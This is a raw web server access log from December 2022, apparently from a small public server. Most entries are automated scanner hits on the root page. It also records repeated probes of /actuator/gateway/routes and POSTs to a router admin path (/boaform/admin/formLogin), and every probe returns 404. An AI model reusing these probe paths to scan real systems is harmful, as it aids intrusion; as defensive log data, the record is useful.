34.77.127.183 - - [02/Dec/2022:06:16:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
141.255.166.2 - - [02/Dec/2022:06:18:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
152.89.196.211 - - [02/Dec/2022:06:18:47 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
141.255.166.2 - - [02/Dec/2022:06:20:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
194.55.186.216 - - [02/Dec/2022:06:22:02 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
142.93.42.136 - - [02/Dec/2022:06:22:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
142.93.42.136 - - [02/Dec/2022:06:22:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
142.93.42.136 - - [02/Dec/2022:06:22:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
152.89.196.211 - - [02/Dec/2022:06:22:32 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
92.118.39.78 - - [02/Dec/2022:06:23:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.78 - - [02/Dec/2022:06:23:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.78 - - [02/Dec/2022:06:23:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
152.89.196.211 - - [02/Dec/2022:06:25:22 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
34.76.96.55 - - [02/Dec/2022:06:25:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
152.89.196.211 - - [02/Dec/2022:06:26:39 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:06:27:44 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:06:29:26 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:06:31:11 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.195.93.98 - - [02/Dec/2022:06:32:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
34.76.158.233 - - [02/Dec/2022:06:32:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
194.55.186.216 - - [02/Dec/2022:06:35:20 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.106.29.122 - - [02/Dec/2022:06:35:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
152.89.196.211 - - [02/Dec/2022:06:38:51 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:06:39:09 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
84.21.172.205 - - [02/Dec/2022:06:40:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
130.211.54.158 - - [02/Dec/2022:06:40:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
35.216.204.3 - - [02/Dec/2022:06:40:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
92.118.39.78 - - [02/Dec/2022:06:49:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.106.29.122 - - [02/Dec/2022:06:52:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
45.9.110.186 - - [02/Dec/2022:06:58:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
